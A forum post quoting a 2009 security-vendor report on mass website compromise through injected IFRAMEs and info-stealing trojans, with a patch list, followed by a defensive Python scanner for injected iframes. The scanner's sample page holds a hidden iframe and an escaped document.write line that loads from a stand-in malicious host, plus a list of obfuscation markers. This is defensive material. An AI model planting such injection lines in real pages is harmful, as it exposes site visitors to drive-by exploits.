FYI...
- http://blog.trendmicro.com/another-w...info-stealers/
June 6, 2009 - "Aside from Gumblar, another incident of mass compromised web sites has been seen in the wild lately, and has raised as much concern as the former. This one starts with the same technique: a malicious IFRAME unknowingly embedded in a legitimate website, injected via JavaScript. The said IFRAME redirects to another IFRAME, which in turn executes obfuscated JavaScript code. Once decoded, it tries to connect to URLs to download exploits for several vulnerabilities in order to gain access to the affected user's system. The obfuscated malicious JavaScript is detected as JS_DROPPER.LOK while the URLs that trigger the download of the exploits are detected as TROJ_SHELLCOD.HT. Upon successful exploitation, other malicious files are then downloaded, which Trend Micro detects as TROJ_MEDPINCH.B and TROJ_MEDPINCH.A. TROJ_MEDPINCH.B connects to other URLs to download the info-stealers SPYW_IEWATCHER and TSPY_LDPINCH.CBS. On the other hand, TROJ_MEDPINCH.A drops yet another info-stealer: TSPY_LDPINCH.ASG. TSPY_LDPINCH.ASG steals account information related to the following applications. This spyware steals user names, passwords, and other account and installation information of the following applications:
• INETCOMM Server
• Microsoft Outlook
• Mirabilis ICQ
• Opera Software
• The Bat!
• Total Commander
• Trillian
Though this compromise occurs within days after Gumblar's last attack, no mention of the Gumblar.{BLOCKED} domain appears in the code. This attack may indeed be a separate one from Gumblar, or possibly be inspired by it. Related URLs are already blocked by the Smart Protection Network, but it is highly advised that users patch their systems to minimize the chances of exploit through the following updates:
* Vulnerability in Windows Explorer Could Allow Remote Execution MS06-057
- http://www.microsoft.com/technet/sec.../ms06-057.mspx
* Buffer overflow in Apple QuickTime 7.1.3
- http://cve.mitre.org/cgi-bin/cvename...=CVE-2007-0015
* Buffer overflow in the WZFILEVIEW.FileViewCtrl.61 ActiveX control
- http://cve.mitre.org/cgi-bin/cvename...=CVE-2006-6884
* Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution - MS06-014
- http://www.microsoft.com/technet/sec.../MS06-014.mspx
* Microsoft Internet Explorer 7 Memory Corruption Exploit - MS09-002
- http://www.microsoft.com/technet/sec.../MS09-002.mspx "
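A site-owner check for the first stage of the chain the post describes (a hidden IFRAME injected into a legitimate page, or one written into it by escaped/obfuscated script). This is an added example, not code from the Trend Micro post or the forum; the sample page and the marker list are constructed assumptions, and the heuristics are indicators to review by hand, not a detection signature.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic markers of script-driven iframe injection (assumption: indicators, not a signature).
OBFUSCATION_MARKERS = ("document.write", "unescape(", "fromCharCode", "eval(")

# Constructed sample page: a legitimate iframe, a hidden injected iframe,
# a script that writes an iframe from URL-escaped text, and a harmless script.
SAMPLE_PAGE = """<html><body><h1>Site</h1>
<iframe src="http://example.test/partner" width="300" height="200"></iframe>
<iframe src="http://bad.example/in.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://evil.example/x%22%3E%3C/iframe%3E'));</script>
<script>var counter = 1;</script>
</body></html>"""
class _Collector(HTMLParser):
    """Collects iframe attributes and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        self._in_script = self._in_script or tag == "script"
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)
def _hidden(attrs):
    """True for 0/1-pixel frames or frames hidden via inline CSS."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = all(str(attrs.get(k, "")).strip("px ") in ("0", "1") for k in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style
def find_suspicious(html, site_host):
    """Return (kind, detail, reason) findings: hidden/off-site iframes and iframe-writing scripts."""
    p = _Collector(); p.feed(html)
    findings = []
    for f in p.iframes:
        src = f.get("src") or ""
        host = urlparse(src).hostname
        if _hidden(f):
            findings.append(("iframe", src, "hidden"))
        elif host and host != site_host:          # frame pulling content from another domain
            findings.append(("iframe", src, "off-site"))
    for s in p.scripts:
        hits = [m for m in OBFUSCATION_MARKERS if m in s]
        # an escaped '<' (%3C or \x3C) next to write/decode calls is the classic injector shape
        if hits and any(t in s.lower() for t in ("iframe", "%3c", "\\x3c")):
            findings.append(("script", ", ".join(hits), "possible iframe injector"))
    return findings
```

Run it over each served page of the site with its own hostname; an iframe to a partner domain is a legitimate "off-site" hit, so the output is a review list, not a verdict.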